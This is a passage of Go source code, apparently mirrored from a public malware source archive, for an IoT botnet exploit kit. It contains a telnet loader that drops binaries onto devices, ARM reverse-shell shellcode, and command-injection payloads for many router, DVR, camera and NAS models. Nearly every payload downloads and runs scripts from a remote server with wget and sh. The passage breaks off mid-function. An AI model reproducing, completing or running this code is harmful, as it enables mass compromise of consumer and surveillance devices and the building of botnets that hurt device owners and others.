mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 08:15:27 +00:00
2892 lines
96 KiB
Go
2892 lines
96 KiB
Go
package main
|
||
|
||
import (
|
||
"net"
|
||
"time"
|
||
"bufio"
|
||
"fmt"
|
||
"os"
|
||
"sync"
|
||
"strings"
|
||
"strconv"
|
||
"io/ioutil"
|
||
"math/rand"
|
||
"encoding/binary"
|
||
"encoding/base64"
|
||
)
|
||
|
||
/*
|
||
|
||
Exploit kit framework 1.0.0.
|
||
|
||
Contains:
|
||
Reverse shell loader (DONE)
|
||
Telnet loader (arch detect, dir detect, echo load) (DONE)
|
||
|
||
Exploits:
|
||
UCHTTPD (DONE)
|
||
TVT-4567 (DONE)
|
||
TVT-WEB (DONE)
|
||
UNIX CCTV (DONE)
|
||
FIBERHOME ROUTER (DONE)
|
||
VIGOR ROUTER (DONE)
|
||
COMTREND ROUTER (DONE)
|
||
GPONFIBER ROUTER (DONE)
|
||
BROADCOM ROUTER (DONE)
|
||
DVRIP (DONE)
|
||
LIBDVR (DONE)
|
||
HONGDIAN ROUTER (DONE)
|
||
REALTEK MULTI ROUTER (DONE)
|
||
TENDA ROUTER (DONE)
|
||
TOTOLINK ROUTER (DONE)
|
||
ALCATEL NAS (DONE)
|
||
LILINDVR (DONE)
|
||
LINKSYS ESERIES (DONE)
|
||
*/
|
||
|
||
const (
|
||
EI_NIDENT int = 16
|
||
EI_DATA int = 5
|
||
EE_LITTLE int = 1
|
||
EE_BIG int = 2
|
||
|
||
EM_ARM int = 40
|
||
EM_MIPS int = 8
|
||
EM_AARCH64 int = 183
|
||
EM_PPC int = 20
|
||
EM_PPC64 int = 21
|
||
EM_SH int = 42
|
||
|
||
DVRIP_NORESP int = 0
|
||
DVRIP_OK int = 100
|
||
DVRIP_FAILED int = 203
|
||
DVRIP_UPGRADED int = 515
|
||
|
||
echoLineLen = 128
|
||
echoDlrOutFile = "qn_local"
|
||
|
||
loaderTvtWebTag = "selfrep.tvt"
|
||
loaderTvt4567Tag = "selfrep.tvt"
|
||
loaderVigorTag = "selfrep.vigor"
|
||
loaderComtrendTag = "selfrep.comtrend"
|
||
loaderGponfiberTag = "selfrep.gponfiber"
|
||
loaderFiberhomeTag = "selfrep.fiberhome"
|
||
loaderLibdvrTag = "selfrep.libdvr"
|
||
loaderDvripTag = "selfrep.dvrip"
|
||
loaderUchttpdTag = "selfrep.uchttpd"
|
||
loaderHongdianTag = "selfrep.hongdian"
|
||
loaderTendaTag = "selfrep.tenda"
|
||
loaderTotolinkTag = "selfrep.totolink"
|
||
loaderZyxelTag = "selfrep.zyxel"
|
||
loaderAlcatleTag = "selfrep.alcatel"
|
||
loaderLilinTag = "selfrep.lilin"
|
||
loaderLinksysTag = "selfrep.linksys"
|
||
loaderZteTag = "selfrep.zte"
|
||
loaderNetgearTag = "selfrep.netgear"
|
||
loaderDlinkTag = "selfrep.dlink"
|
||
|
||
loaderDownloadServer = "1.1.1.1" // Remote IP Of Server With Bins And Sh Files
|
||
loaderBinsLocation = "/a/b/" // Path To Bins
|
||
loaderScriptsLocation = "/a/" // Path To Bins
|
||
)
|
||
|
||
type elfHeader struct {
|
||
e_ident[EI_NIDENT] int8
|
||
e_type, e_machine int16
|
||
e_version int32
|
||
}
|
||
|
||
type smapsRegion struct {
|
||
region uint64
|
||
size, pss, rss int
|
||
shared_clean, shared_ditry int
|
||
private_clean, private_dirty int
|
||
}
|
||
|
||
type echoDropper struct {
|
||
payload [128]string
|
||
payload_count int
|
||
}
|
||
|
||
var (
|
||
netTimeout time.Duration = 30
|
||
workerGroup sync.WaitGroup
|
||
magicGroup sync.WaitGroup
|
||
mode, doExploit string
|
||
exploitMap map[string]interface{}
|
||
dropperMap map[string]echoDropper
|
||
)
|
||
|
||
// counters
|
||
var telShells, payloadSent int
|
||
|
||
var (
|
||
// uc exploit settings
|
||
// should be reverse shell to same ip as loader on port 31391
|
||
uchttpdShellCode string = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde"
|
||
ucRshellPort int = 31412
|
||
|
||
// tvt exploit settings
|
||
tvtWebPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvtWebTag
|
||
tvt4567Payload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvt4567Tag
|
||
|
||
// magic exploit settings
|
||
magicPacketIds []string = []string{"\x62", "\x69", "\x6c", "\x52", "\x44", "\x67", "\x43", "\x4d"}
|
||
magicPorts []int = []int{1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8010, 8020, 8030, 8040, 8050, 8060, 8070, 8080, 8090, 8100, 8200, 8300, 8400, 8500, 8600, 8700, 8800, 8888, 8900, 8999, 9000, 9090}
|
||
magicPayload string = "wget http://rippr.cc/u -O-|sh;"
|
||
|
||
// lilindvr payload
|
||
lilinPayload string = "wget -O- http://" + loaderDownloadServer + "/l|sh"
|
||
|
||
// fiberhome exploit settings
|
||
fiberRandPort int = 1 // 0 for use below
|
||
fiberStaticPort int = 31784
|
||
fiberSecStrs []string = []string{"0.3123525368318707", "0.13378587435314315", "0.8071510413685209"}
|
||
|
||
// vigor exploit settings
|
||
vigorPayload string = "bin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F" + loaderDownloadServer + loaderBinsLocation + "bot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Dbot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Fbot.arm7%24%7BIFS%7D" + loaderVigorTag + "%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Dbot.arm7"
|
||
|
||
// broadcom router settings
|
||
broadcomPayload string = "$(wget%20http://" + loaderDownloadServer + "/b%20-O-|sh)"
|
||
|
||
// hongdian router settings
|
||
hongdianPayload string = "cd+/tmp%3Bbusybox+wget+http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh+-O-+>sfs;chmod+777+sfs%3Bsh+sfs+" + loaderHongdianTag + "%3Brm+-rf+sfs"
|
||
|
||
// tenda router settings
|
||
tendaPayload string = "cd%20/tmp%3Brm%20wget.sh%3Bwget%20http%3A//" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%3Bchmod%20777%20wget.sh%3Bsh%20wget.sh%20" + loaderTendaTag
|
||
|
||
// totlink router settings
|
||
totolinkPayload string = "wget%20http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%20-O%20-%20%3Esplash.sh%3B%20chmod%20777%20splash.sh%3B%20sh%20splash.sh%20" + loaderTotolinkTag
|
||
|
||
// zyxel nas settings
|
||
zyxelPayload string = "cd%20/tmp;wget%20http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20" + loaderZyxelTag + ";"
|
||
zyxelPayloadTwo string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"
|
||
|
||
// alcatel nas settings
|
||
alcatelPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderAlcatleTag
|
||
|
||
// linksys router settings
|
||
linksysPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
|
||
linksysTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
|
||
|
||
// zte router settings
|
||
ztePayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"
|
||
|
||
// netgear router settings
|
||
netgearPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderNetgearTag + "%3Brm+-rf+wget.sh"
|
||
|
||
// gpon router settings
|
||
gponOGPayload string = "wget+http%3A%2F%2F" + loaderDownloadServer + "%2Fg+-O-%7Csh%60%3Bwget+http%3A%2F%2F37.0.11.220%2Fg+-O-%7Csh"
|
||
|
||
// dlink router settings
|
||
dlinkTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderDlinkTag + "%3Brm+-rf+wget.sh"
|
||
dlinkThreePayload string = "cd /tmp;wget http://" + loaderDownloadServer + "/a/wget.sh;chmod 777 wget.sh;sh wget.sh " + loaderDlinkTag + ";rm -rf wget.sh"
|
||
)
|
||
|
||
func zeroByte(a []byte) {
|
||
|
||
for i := range a {
|
||
a[i] = 0
|
||
}
|
||
}
|
||
|
||
func getStringInBetween(str string, start string, end string) (result string) {
|
||
|
||
s := strings.Index(str, start)
|
||
if s == -1 {
|
||
return
|
||
}
|
||
|
||
s += len(start)
|
||
e := strings.Index(str, end)
|
||
|
||
if (s > 0 && e > s + 1) {
|
||
return str[s:e]
|
||
} else {
|
||
return "null"
|
||
}
|
||
}
|
||
|
||
func randStr(strlen int) (string) {
|
||
|
||
var b strings.Builder
|
||
|
||
rand.Seed(time.Now().UnixNano())
|
||
chars := []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
|
||
|
||
for i := 0; i < strlen; i++ {
|
||
b.WriteRune(chars[rand.Intn(len(chars))])
|
||
}
|
||
|
||
return b.String()
|
||
}
|
||
|
||
func hexToInt(hexStr string) (uint64) {
|
||
cleaned := strings.Replace(hexStr, "0x", "", -1)
|
||
result, _ := strconv.ParseUint(cleaned, 16, 64)
|
||
return uint64(result)
|
||
}
|
||
|
||
/* TELNET LOADER MODULE */
|
||
|
||
func telnetLoadDroppers() {
|
||
|
||
files, err := ioutil.ReadDir("dlrs")
|
||
if err != nil {
|
||
fmt.Printf("\033[1;31mError: Failed to open dlrs/\r\n")
|
||
os.Exit(0)
|
||
}
|
||
|
||
for i := 0; i < len(files); i++ {
|
||
file, err := os.OpenFile("dlrs/" + files[i].Name(), os.O_RDONLY, 0755)
|
||
if err != nil {
|
||
continue
|
||
}
|
||
|
||
mapVal := echoDropper{}
|
||
mapVal.payload_count = 0
|
||
|
||
for {
|
||
var echoString string
|
||
dataBuf := make([]byte, echoLineLen)
|
||
|
||
length, err := file.Read(dataBuf)
|
||
if err != nil || length <= 0 {
|
||
break
|
||
}
|
||
|
||
for i := 0; i < length; i++ {
|
||
echoByte := fmt.Sprintf("\\x%02x", uint8(dataBuf[i]))
|
||
echoString += echoByte
|
||
}
|
||
|
||
if mapVal.payload_count == 0 {
|
||
mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" > ", echoString)
|
||
} else {
|
||
mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" >> ", echoString)
|
||
}
|
||
|
||
mapVal.payload_count++
|
||
}
|
||
|
||
dropperMap[files[i].Name()] = mapVal
|
||
file.Close()
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mLoader\x1b[38;5;15m: \x1b[38;5;15mLoaded \x1b[38;5;134m%d\x1b[38;5;15m echo droppers\x1b[38;5;15m\x1b[38;5;15m\r\n", len(dropperMap))
|
||
}
|
||
|
||
func telnetHasPrompt(buffer string) (bool) {
|
||
|
||
if strings.Contains(buffer, "#") || strings.Contains(buffer, ">") || strings.Contains(buffer, "$") || strings.Contains(buffer, "%") || strings.Contains(buffer, "@") {
|
||
return true
|
||
} else {
|
||
return false
|
||
}
|
||
}
|
||
|
||
func telnetBusyboxShell(conn net.Conn) {
|
||
|
||
/* Looks wierd but dw its for some BCM router */
|
||
conn.Write([]byte("sh\r\n"))
|
||
conn.Write([]byte("..\r\n"))
|
||
conn.Write([]byte("linuxshell\r\n"))
|
||
/* ------------------------------------------ */
|
||
|
||
conn.Write([]byte("enable\r\n"))
|
||
conn.Write([]byte("development\r\n"))
|
||
conn.Write([]byte("system\r\n"))
|
||
conn.Write([]byte("sh\r\n"))
|
||
conn.Write([]byte("shell\r\n"))
|
||
conn.Write([]byte("ping ; sh\r\n"))
|
||
}
|
||
|
||
func telnetDropDropper(conn net.Conn, myarch string) (bool) {
|
||
|
||
for arch, mapval := range dropperMap {
|
||
splitVal := strings.Split(arch, ".")
|
||
if len(splitVal) != 2 {
|
||
continue
|
||
}
|
||
|
||
if splitVal[1] == myarch {
|
||
query := randStr(5)
|
||
dropper := randStr(5)
|
||
droppedLines := 0
|
||
|
||
for i := 0; i < mapval.payload_count; i++ {
|
||
var rdbuf []byte = []byte("")
|
||
complete := 0
|
||
|
||
conn.Write([]byte(mapval.payload[i] + dropper + "; /bin/busybox " + query + "\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), ": applet not found") {
|
||
complete = 1
|
||
break
|
||
}
|
||
}
|
||
|
||
if complete == 0 {
|
||
return false
|
||
}
|
||
|
||
droppedLines++
|
||
}
|
||
|
||
if droppedLines == mapval.payload_count {
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn.Write([]byte("chmod 777 " + dropper + "; ./" + dropper + "; rm -rf " + dropper + "; /bin/busybox " + query + "\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), ": applet not found") {
|
||
return true
|
||
}
|
||
}
|
||
|
||
return false
|
||
} else {
|
||
return false
|
||
}
|
||
} else {
|
||
continue
|
||
}
|
||
}
|
||
|
||
return false
|
||
}
|
||
|
||
func telnetHasBusybox(conn net.Conn) (bool, string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
query := randStr(6)
|
||
resp := ": applet not found"
|
||
|
||
conn.Write([]byte("/bin/busybox " + query + "\r\n"))
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), resp) == true {
|
||
index := strings.Index(string(rdbuf), "BusyBox v")
|
||
if index == -1 {
|
||
return true, "unknown"
|
||
} else {
|
||
verstr := strings.Split(string(rdbuf)[len("BusyBox v")+index:], " ")
|
||
if len(verstr) > 0 {
|
||
return true, verstr[0]
|
||
} else {
|
||
return true, "unknown"
|
||
}
|
||
|
||
}
|
||
}
|
||
}
|
||
|
||
return false, "unknown"
|
||
}
|
||
|
||
func telnetWritableDir(conn net.Conn) (bool, string) {
|
||
|
||
var rdbuf []byte
|
||
dirs := []string{"/tmp/", "/var/tmp/", "/var/", "/mnt/", "/etc/", "/", "/dev/"}
|
||
|
||
for i := 0; i < len(dirs); i++ {
|
||
echoStr := randStr(4)
|
||
conn.Write([]byte("cd " + dirs[i] + " && echo " + echoStr + "\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "can't cd") || strings.Contains(string(rdbuf), "No such file or") {
|
||
break
|
||
} else if strings.Contains(string(rdbuf), echoStr) {
|
||
return true, dirs[i]
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
}
|
||
|
||
return false, "none"
|
||
}
|
||
|
||
func telnetExtractArch(conn net.Conn) (bool, string) {
|
||
|
||
var rdbuf []byte
|
||
var index int = -1
|
||
|
||
conn.Write([]byte("/bin/busybox cat /bin/echo\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
index = strings.Index(string(rdbuf), "ELF")
|
||
|
||
if index != -1 {
|
||
zeroByte(tmpbuf)
|
||
ln, err := conn.Read(tmpbuf)
|
||
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
break
|
||
}
|
||
}
|
||
|
||
if index == -1 {
|
||
return false, "none"
|
||
}
|
||
|
||
rdbuf = rdbuf[index:]
|
||
elfHdr := elfHeader{}
|
||
|
||
for i := 0; i < EI_NIDENT; i++ {
|
||
elfHdr.e_ident[i] = int8(rdbuf[i])
|
||
}
|
||
|
||
elfHdr.e_type = int16(rdbuf[EI_NIDENT])
|
||
elfHdr.e_machine = int16(rdbuf[EI_NIDENT + 2])
|
||
elfHdr.e_version = int32(rdbuf[EI_NIDENT + 2 + 2])
|
||
|
||
if elfHdr.e_machine == int16(EM_ARM) {
|
||
return true, "arm"
|
||
} else if elfHdr.e_machine == int16(EM_MIPS) {
|
||
if elfHdr.e_ident[EI_DATA] == int8(EE_LITTLE) {
|
||
return true, "mpsl"
|
||
} else {
|
||
return true, "mips"
|
||
}
|
||
} else if elfHdr.e_machine == int16(EM_PPC) || elfHdr.e_machine == int16(EM_PPC64) {
|
||
return true, "ppc"
|
||
} else if elfHdr.e_machine == int16(EM_SH) {
|
||
return true, "sh4"
|
||
}
|
||
|
||
return false, ""
|
||
}
|
||
|
||
func telnetLoader(target string, dologin int, arch string, tag string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
loggedIn int = 0
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
if dologin == 0 {
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if telnetHasPrompt(string(rdbuf)) == true {
|
||
loggedIn = 1
|
||
break
|
||
}
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
if loggedIn == 0 {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m shell found on device\x1b[38;5;15m\x1b[38;5;15m\r\n", target)
|
||
telnetBusyboxShell(conn)
|
||
|
||
has, ver := telnetHasBusybox(conn)
|
||
if has == false {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m device is running busybox version \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver)
|
||
telShells++
|
||
|
||
has, dir := telnetWritableDir(conn)
|
||
if has == false {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s\x1b[38;5;15m found writable directory \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir)
|
||
|
||
has, _ = telnetHasBusybox(conn)
|
||
if has == false {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s\x1b[38;5;15m extracted arch \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir, arch)
|
||
|
||
dropped := telnetDropDropper(conn, arch)
|
||
if dropped == false {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s:%s\x1b[38;5;15m finnished echo loading\x1b[38;5;15m\r\n", target, ver, dir, arch)
|
||
|
||
binName := randStr(6)
|
||
conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + tag + "\r\n"))
|
||
// Done?
|
||
time.Sleep(5 * time.Second)
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
/* ------ END OF TELNET LOADER ------- */
|
||
|
||
/* ------ OTHER PROTOCOL STUFF ------- */
|
||
|
||
func reverseShellUchttpdLoader(conn net.Conn) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
query string = randStr(5)
|
||
)
|
||
|
||
conn.Write([]byte(">/tmp/.h && cd /tmp/\r\n"))
|
||
conn.Write([]byte(">/mnt/.h && cd /mnt/\r\n"))
|
||
conn.Write([]byte(">/var/.h && cd /var/\r\n"))
|
||
conn.Write([]byte(">/dev/.h && cd /dev/\r\n"))
|
||
conn.Write([]byte(">/var/tmp/.h && cd /var/tmp/\r\n"))
|
||
conn.Write([]byte("/bin/busybox " + query + "\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), ": applet not found") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
|
||
dropped := telnetDropDropper(conn, "arm7")
|
||
if dropped == false {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
fmt.Printf("\x1b[38;5;46mUchttpd\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr())
|
||
payloadSent++
|
||
binName := randStr(6)
|
||
conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + loaderUchttpdTag + ";\r\n"))
|
||
conn.Write([]byte("/var/Sofia 2>/dev/null &\r\n"))
|
||
return
|
||
}
|
||
|
||
func infectFunctionTvt4567(conn net.Conn) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
state = 0
|
||
)
|
||
|
||
payload := "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00\x50\x02\x00\x00\x50\x02\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x75\x74\x66\x2d\x38\x22\x3f\x3e\x3c\x72\x65\x71\x75\x65\x73\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x73\x79\x73\x74\x65\x6d\x54\x79\x70\x65\x3d\x22\x4e\x56\x4d\x53\x2d\x39\x30\x30\x30\x22\x20\x63\x6c\x69\x65\x6e\x74\x54\x79\x70\x65\x3d\x22\x57\x45\x42\x22\x3e\x3c\x74\x79\x70\x65\x73\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x61\x6c\x6c\x6f\x77\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x72\x61\x6e\x67\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x6d\x61\x63\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x2f\x74\x79\x70\x65\x73\x3e\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x22\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x3e\x3c\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x20\x74\x79\x70\x65\x3d\x22\x6c\x69\x73\x74\x22\x3e\x3c\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x22\x2f\x3e\x3c\x2f\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x69\x74\x65\x6d\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x69\x70\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x69\x70\x3e\x24\x28"
|
||
payload += tvt4567Payload
|
||
payload += "\x3c\x2f\x69\x70\x3e\x3c\x2f\x69\x74\x65\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x3e\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x3e\x00"
|
||
payload = base64.StdEncoding.EncodeToString([]byte(payload))
|
||
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("{D79E94C5-70F0-46BD-965B-E17497CCB598}"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if strings.Contains(string(rdbuf), "{D79E94C5-70F0-46BD-965B-E17497CCB598}") && state != 1 {
|
||
conn.Write([]byte("GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: " + cntlen + "\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n" + payload + "\r\n\r\n"))
|
||
zeroByte(rdbuf)
|
||
state = 1
|
||
continue
|
||
} else if strings.Contains(string(rdbuf), "200") && state == 1 {
|
||
fmt.Printf("\x1b[38;5;46mTvt-4567\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr().String())
|
||
conn.Close()
|
||
payloadSent++
|
||
return
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionMagicProto(target string) {
|
||
|
||
var (
|
||
rdbuf []byte = []byte("")
|
||
state = 0
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
magicGroup.Done()
|
||
return
|
||
}
|
||
|
||
payloadOne := "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00"
|
||
